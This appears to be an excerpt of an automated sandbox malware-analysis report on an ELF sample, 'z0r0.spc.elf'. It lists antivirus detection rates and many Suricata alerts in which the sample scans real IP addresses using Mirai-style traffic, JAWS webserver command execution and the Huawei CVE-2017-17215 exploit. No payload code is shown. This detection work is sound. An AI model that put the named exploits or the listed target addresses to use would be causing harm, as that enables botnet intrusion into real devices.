              2025-02-04T18:11:48.070767+010028352221A Network Trojan was detected192.168.2.1557036197.114.86.9937215TCP
              2025-02-04T18:11:48.072226+010028352221A Network Trojan was detected192.168.2.155711641.143.10.7537215TCP
              2025-02-04T18:11:48.072241+010028352221A Network Trojan was detected192.168.2.1540830156.87.5.737215TCP
              2025-02-04T18:11:48.072624+010028352221A Network Trojan was detected192.168.2.155245641.85.95.10737215TCP
              2025-02-04T18:11:49.048655+010028352221A Network Trojan was detected192.168.2.1553260156.251.53.10937215TCP
              2025-02-04T18:11:49.048666+010028352221A Network Trojan was detected192.168.2.1549744156.245.26.16837215TCP
              2025-02-04T18:11:49.048821+010028352221A Network Trojan was detected192.168.2.155915841.52.186.23337215TCP
              2025-02-04T18:11:49.049182+010028352221A Network Trojan was detected192.168.2.153572241.234.119.21737215TCP
              2025-02-04T18:11:49.050079+010028352221A Network Trojan was detected192.168.2.155073641.120.185.17837215TCP
              2025-02-04T18:11:49.050203+010028352221A Network Trojan was detected192.168.2.1545374156.81.131.25037215TCP
              2025-02-04T18:11:49.050482+010028352221A Network Trojan was detected192.168.2.153317841.197.57.12137215TCP
              2025-02-04T18:11:49.050725+010028352221A Network Trojan was detected192.168.2.1534482197.63.184.8337215TCP
              2025-02-04T18:11:49.052178+010028352221A Network Trojan was detected192.168.2.1546348156.174.17.21937215TCP
              2025-02-04T18:11:49.052434+010028352221A Network Trojan was detected192.168.2.1538782197.252.192.1937215TCP
              2025-02-04T18:11:49.052551+010028352221A Network Trojan was detected192.168.2.1537846156.182.107.11237215TCP
              2025-02-04T18:11:49.053876+010028352221A Network Trojan was detected192.168.2.1535618156.73.111.2737215TCP
              2025-02-04T18:11:49.054175+010028352221A Network Trojan was detected192.168.2.155065841.42.215.5637215TCP
              2025-02-04T18:11:49.064092+010028352221A Network Trojan was detected192.168.2.1549576197.21.28.24537215TCP
              2025-02-04T18:11:49.065720+010028352221A Network Trojan was detected192.168.2.1546520197.222.42.11637215TCP
              2025-02-04T18:11:49.065762+010028352221A Network Trojan was detected192.168.2.153773441.206.96.11437215TCP
              2025-02-04T18:11:49.066132+010028352221A Network Trojan was detected192.168.2.1560858197.64.98.15037215TCP
              2025-02-04T18:11:49.066248+010028352221A Network Trojan was detected192.168.2.155359441.39.206.037215TCP
              2025-02-04T18:11:49.066374+010028352221A Network Trojan was detected192.168.2.1539584197.105.30.16337215TCP
              2025-02-04T18:11:49.066578+010028352221A Network Trojan was detected192.168.2.155086441.99.147.7537215TCP
              2025-02-04T18:11:49.066672+010028352221A Network Trojan was detected192.168.2.154399041.218.164.9637215TCP
              2025-02-04T18:11:49.067685+010028352221A Network Trojan was detected192.168.2.155410041.46.173.3537215TCP
              2025-02-04T18:11:49.068083+010028352221A Network Trojan was detected192.168.2.1553268197.66.30.11537215TCP
              2025-02-04T18:11:49.068167+010028352221A Network Trojan was detected192.168.2.154156841.238.198.6537215TCP
              2025-02-04T18:11:49.069516+010028352221A Network Trojan was detected192.168.2.1544650156.214.132.16837215TCP
              2025-02-04T18:11:49.069846+010028352221A Network Trojan was detected192.168.2.1542568197.36.149.9637215TCP
              2025-02-04T18:11:49.071676+010028352221A Network Trojan was detected192.168.2.155888041.18.226.2937215TCP
              2025-02-04T18:11:50.050135+010028352221A Network Trojan was detected192.168.2.1548220197.240.250.337215TCP
              2025-02-04T18:11:50.064019+010028352221A Network Trojan was detected192.168.2.1541518156.11.101.22837215TCP
              2025-02-04T18:11:50.064026+010028352221A Network Trojan was detected192.168.2.156076441.120.96.21137215TCP
              2025-02-04T18:11:50.064884+010028352221A Network Trojan was detected192.168.2.1558036156.113.150.1237215TCP
              2025-02-04T18:11:50.065667+010028352221A Network Trojan was detected192.168.2.1544554156.215.191.8037215TCP
              2025-02-04T18:11:50.065983+010028352221A Network Trojan was detected192.168.2.1539368197.140.151.12937215TCP
              2025-02-04T18:11:50.066127+010028352221A Network Trojan was detected192.168.2.153632441.215.202.6737215TCP
              2025-02-04T18:11:50.070746+010028352221A Network Trojan was detected192.168.2.1540472197.145.133.21337215TCP
              2025-02-04T18:11:50.071038+010028352221A Network Trojan was detected192.168.2.153387041.182.224.2437215TCP
              2025-02-04T18:11:50.081359+010028352221A Network Trojan was detected192.168.2.153867641.174.162.15037215TCP
              2025-02-04T18:11:50.081543+010028352221A Network Trojan was detected192.168.2.1540846197.36.190.16037215TCP
              2025-02-04T18:11:50.083435+010028352221A Network Trojan was detected192.168.2.1553598156.182.235.15737215TCP
              2025-02-04T18:11:50.085886+010028352221A Network Trojan was detected192.168.2.1555220156.51.228.21437215TCP
              2025-02-04T18:11:50.095127+010028352221A Network Trojan was detected192.168.2.155973441.196.83.10637215TCP
              2025-02-04T18:11:50.095219+010028352221A Network Trojan was detected192.168.2.1540192197.193.66.16737215TCP
              2025-02-04T18:11:50.096011+010028352221A Network Trojan was detected192.168.2.1533032156.54.150.13337215TCP
              2025-02-04T18:11:50.097020+010028352221A Network Trojan was detected192.168.2.1554882197.35.168.16837215TCP
              2025-02-04T18:11:50.099396+010028352221A Network Trojan was detected192.168.2.153781041.98.45.22337215TCP
              2025-02-04T18:11:50.101396+010028352221A Network Trojan was detected192.168.2.155171841.227.108.8137215TCP
              2025-02-04T18:11:50.805332+010028352221A Network Trojan was detected192.168.2.1549734197.215.149.14337215TCP
              2025-02-04T18:11:51.064130+010028352221A Network Trojan was detected192.168.2.153676841.226.106.7837215TCP
              2025-02-04T18:11:51.079712+010028352221A Network Trojan was detected192.168.2.154986241.133.59.9937215TCP
              2025-02-04T18:11:51.083769+010028352221A Network Trojan was detected192.168.2.1554470197.128.142.3037215TCP
              2025-02-04T18:11:51.097454+010028352221A Network Trojan was detected192.168.2.1534244156.46.215.10337215TCP
              2025-02-04T18:11:51.097459+010028352221A Network Trojan was detected192.168.2.155381641.119.236.2137215TCP
              2025-02-04T18:11:51.101065+010028352221A Network Trojan was detected192.168.2.1557464156.156.184.7337215TCP
              2025-02-04T18:11:51.101149+010028352221A Network Trojan was detected192.168.2.155960641.245.10.18937215TCP
              2025-02-04T18:11:51.117203+010028352221A Network Trojan was detected192.168.2.1556184197.243.14.23837215TCP
              2025-02-04T18:11:51.117998+010028352221A Network Trojan was detected192.168.2.1550666197.30.141.5837215TCP
              2025-02-04T18:11:51.319108+010028352221A Network Trojan was detected192.168.2.1551758197.6.58.5137215TCP
              2025-02-04T18:11:52.142320+010028352221A Network Trojan was detected192.168.2.1538758156.228.59.24337215TCP
              2025-02-04T18:11:52.142430+010028352221A Network Trojan was detected192.168.2.1535412156.27.33.19037215TCP
              2025-02-04T18:11:52.142500+010028352221A Network Trojan was detected192.168.2.1535776197.129.167.2737215TCP
              2025-02-04T18:11:52.142651+010028352221A Network Trojan was detected192.168.2.1557014156.213.195.23137215TCP
              2025-02-04T18:11:52.144013+010028352221A Network Trojan was detected192.168.2.154080041.132.7.11137215TCP
              2025-02-04T18:11:52.144014+010028352221A Network Trojan was detected192.168.2.1537072156.141.92.15437215TCP
              2025-02-04T18:11:52.144139+010028352221A Network Trojan was detected192.168.2.1535546156.28.127.12237215TCP
              2025-02-04T18:11:52.144268+010028352221A Network Trojan was detected192.168.2.1557962197.126.110.19037215TCP
              2025-02-04T18:11:52.144579+010028352221A Network Trojan was detected192.168.2.1532832156.31.61.10837215TCP
              2025-02-04T18:11:52.145879+010028352221A Network Trojan was detected192.168.2.155074041.234.28.7937215TCP
              2025-02-04T18:11:52.146199+010028352221A Network Trojan was detected192.168.2.1534142197.181.221.18937215TCP
              2025-02-04T18:11:52.147700+010028352221A Network Trojan was detected192.168.2.1553150197.249.221.10037215TCP
              2025-02-04T18:11:52.147930+010028352221A Network Trojan was detected192.168.2.155266241.136.226.23737215TCP
              2025-02-04T18:11:52.148099+010028352221A Network Trojan was detected192.168.2.1553318197.211.188.22537215TCP
              2025-02-04T18:11:52.160189+010028352221A Network Trojan was detected192.168.2.1538226197.55.241.3637215TCP
              2025-02-04T18:11:52.163338+010028352221A Network Trojan was detected192.168.2.155737841.87.45.4537215TCP
              2025-02-04T18:11:52.236750+010028352221A Network Trojan was detected192.168.2.1534116197.234.83.11337215TCP
              2025-02-04T18:11:53.141477+010028352221A Network Trojan was detected192.168.2.154201241.64.149.18437215TCP
              2025-02-04T18:11:53.142196+010028352221A Network Trojan was detected192.168.2.1535616156.36.152.18337215TCP
              2025-02-04T18:11:53.142274+010028352221A Network Trojan was detected192.168.2.1556642197.135.112.12237215TCP
              2025-02-04T18:11:53.142772+010028352221A Network Trojan was detected192.168.2.153837441.250.33.10037215TCP
              2025-02-04T18:11:53.142846+010028352221A Network Trojan was detected192.168.2.153907841.140.131.21537215TCP
              2025-02-04T18:11:53.143831+010028352221A Network Trojan was detected192.168.2.1547066156.20.100.11537215TCP
              2025-02-04T18:11:53.144008+010028352221A Network Trojan was detected192.168.2.154953241.176.35.5537215TCP
              2025-02-04T18:11:53.144019+010028352221A Network Trojan was detected192.168.2.1560586156.103.35.18437215TCP
              2025-02-04T18:11:53.144133+010028352221A Network Trojan was detected192.168.2.1546452197.61.155.21137215TCP
              2025-02-04T18:11:53.144270+010028352221A Network Trojan was detected192.168.2.154823441.210.2.24137215TCP
              2025-02-04T18:11:53.144298+010028352221A Network Trojan was detected192.168.2.155622641.240.131.19637215TCP
              2025-02-04T18:11:53.144313+010028352221A Network Trojan was detected192.168.2.1547470197.254.99.8337215TCP
              2025-02-04T18:11:53.144840+010028352221A Network Trojan was detected192.168.2.1537714156.220.75.24637215TCP
              2025-02-04T18:11:53.146036+010028352221A Network Trojan was detected192.168.2.155043641.159.35.8837215TCP
              2025-02-04T18:11:53.146324+010028352221A Network Trojan was detected192.168.2.1546592156.127.55.17137215TCP
              2025-02-04T18:11:53.157808+010028352221A Network Trojan was detected192.168.2.1539420156.85.233.4037215TCP
              2025-02-04T18:11:53.157874+010028352221A Network Trojan was detected192.168.2.1544752156.138.212.2037215TCP
              2025-02-04T18:11:53.157993+010028352221A Network Trojan was detected192.168.2.155236041.110.170.23937215TCP
              2025-02-04T18:11:53.160491+010028352221A Network Trojan was detected192.168.2.1541710197.139.199.10637215TCP
              2025-02-04T18:11:53.160497+010028352221A Network Trojan was detected192.168.2.153338241.50.215.9337215TCP
              2025-02-04T18:11:53.160543+010028352221A Network Trojan was detected192.168.2.153824441.33.245.9337215TCP
              2025-02-04T18:11:53.160638+010028352221A Network Trojan was detected192.168.2.1555346156.89.99.8837215TCP
              2025-02-04T18:11:53.160866+010028352221A Network Trojan was detected192.168.2.154867041.148.175.2937215TCP
              2025-02-04T18:11:53.161910+010028352221A Network Trojan was detected192.168.2.1546462156.195.120.237215TCP
              2025-02-04T18:11:53.163883+010028352221A Network Trojan was detected192.168.2.1560406156.7.78.7737215TCP
              2025-02-04T18:11:53.163949+010028352221A Network Trojan was detected192.168.2.1546138156.46.96.6137215TCP
              2025-02-04T18:11:53.179463+010028352221A Network Trojan was detected192.168.2.1553704156.68.88.22037215TCP
              2025-02-04T18:11:53.179524+010028352221A Network Trojan was detected192.168.2.1546522197.141.228.21537215TCP
              2025-02-04T18:11:53.179937+010028352221A Network Trojan was detected192.168.2.1557970197.173.111.13637215TCP
              2025-02-04T18:11:55.173660+010028352221A Network Trojan was detected192.168.2.154070641.200.32.8237215TCP
              2025-02-04T18:11:55.175193+010028352221A Network Trojan was detected192.168.2.155816041.127.12.437215TCP
              2025-02-04T18:11:55.179460+010028352221A Network Trojan was detected192.168.2.1539384197.253.89.23537215TCP
              2025-02-04T18:11:55.794475+010028352221A Network Trojan was detected192.168.2.1537508156.239.255.15637215TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: z0r0.spc.elfAvira: detected
              Source: z0r0.spc.elfVirustotal: Detection: 64%Perma Link
              Source: z0r0.spc.elfReversingLabs: Detection: 71%

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:56376 -> 66.135.17.87:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:56376 -> 66.135.17.87:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:56618 -> 163.191.21.183:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:56618 -> 163.191.21.183:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:52314 -> 150.158.10.51:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:52314 -> 150.158.10.51:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:36874 -> 152.23.93.45:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:36874 -> 152.23.93.45:80
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:34772 -> 156.229.156.25:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:37246 -> 156.231.87.111:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:60888 -> 195.210.137.30:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:60888 -> 195.210.137.30:80
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:60960 -> 41.164.28.9:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:34476 -> 177.53.138.249:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:34476 -> 177.53.138.249:80
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:47622 -> 41.234.231.15:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:35578 -> 197.210.178.63:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:41028 -> 156.246.225.38:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:48968 -> 197.129.25.151:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:41246 -> 52.185.24.228:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:41246 -> 52.185.24.228:80
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:36728 -> 41.212.96.51:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:48226 -> 95.13.149.114:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:48226 -> 95.13.149.114:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:40594 -> 80.99.95.150:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:55492 -> 12.97.179.162:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:40594 -> 80.99.95.150:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:55492 -> 12.97.179.162:80
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:47592 -> 156.232.252.30:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:56422 -> 197.186.125.49:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:36720 -> 181.156.61.20:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:55456 -> 177.82.8.49:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:47426 -> 173.206.97.190:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:55456 -> 177.82.8.49:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:36720 -> 181.156.61.20:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:47426 -> 173.206.97.190:80
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:53094 -> 41.229.92.72:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:45246 -> 181.72.225.6:80
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:48016 -> 197.249.19.10:37215
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:45246 -> 181.72.225.6:80
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:37500 -> 41.80.3.189:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:33992 -> 197.172.1.62:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:44564 -> 41.156.70.108:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:52328 -> 84.59.111.135:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:52328 -> 84.59.111.135:80
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:57500 -> 41.229.202.43:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:49706 -> 197.159.207.228:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:54460 -> 197.212.217.236:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:34294 -> 41.216.131.125:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:35832 -> 197.157.167.236:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:38138 -> 41.89.103.100:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:33892 -> 75.202.255.136:80
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:42116 -> 41.197.212.105:37215
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:33892 -> 75.202.255.136:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:49594 -> 115.185.195.251:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:49594 -> 115.185.195.251:80
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:43928 -> 197.0.255.111:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:34258 -> 139.62.254.107:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:34258 -> 139.62.254.107:80
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:36264 -> 156.52.86.18:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:46086 -> 104.108.17.71:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:46086 -> 104.108.17.71:80
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:56890 -> 156.221.146.36:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:56634 -> 148.124.95.174:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:56634 -> 148.124.95.174:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:48452 -> 59.197.123.191:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:48452 -> 59.197.123.191:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:58820 -> 19.144.149.113:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:58820 -> 19.144.149.113:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:53656 -> 116.7.76.23:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:37250 -> 171.125.195.174:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:37250 -> 171.125.195.174:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:41596 -> 204.180.52.55:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:41596 -> 204.180.52.55:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:53656 -> 116.7.76.23:80
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:51726 -> 41.89.186.103:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:38276 -> 19.122.225.91:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:38276 -> 19.122.225.91:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:32782 -> 200.162.125.49:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:40282 -> 122.230.149.114:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:32782 -> 200.162.125.49:80
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:39240 -> 197.74.8.49:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:58508 -> 106.129.170.230:80
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:52870 -> 156.118.10.77:37215
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:40282 -> 122.230.149.114:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:58508 -> 106.129.170.230:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:44592 -> 178.15.78.97:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:44592 -> 178.15.78.97:80
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:38764 -> 197.153.167.125:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:35030 -> 41.237.200.164:37215
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:42968 -> 197.109.186.149:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:33174 -> 148.218.47.162:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:33174 -> 148.218.47.162:80
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:38780 -> 197.109.31.175:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:47786 -> 41.137.229.247:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:47786 -> 41.137.229.247:80
              Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.15:47320 -> 197.14.66.12:37215
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:38698 -> 206.18.177.12:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:38698 -> 206.18.177.12:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:53500 -> 126.88.175.215:80
              Source: Network trafficSuricata IDS: 2030092 - Severity 1 - ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution : 192.168.2.15:53500 -> 126.88.175.215:80
              Source: Network trafficSuricata IDS: 2029034 - Severity 1 - ET MALWARE Mirai Variant User-Agent (Outbound) : 192.168.2.15:53966 -> 82.32.93.110:80
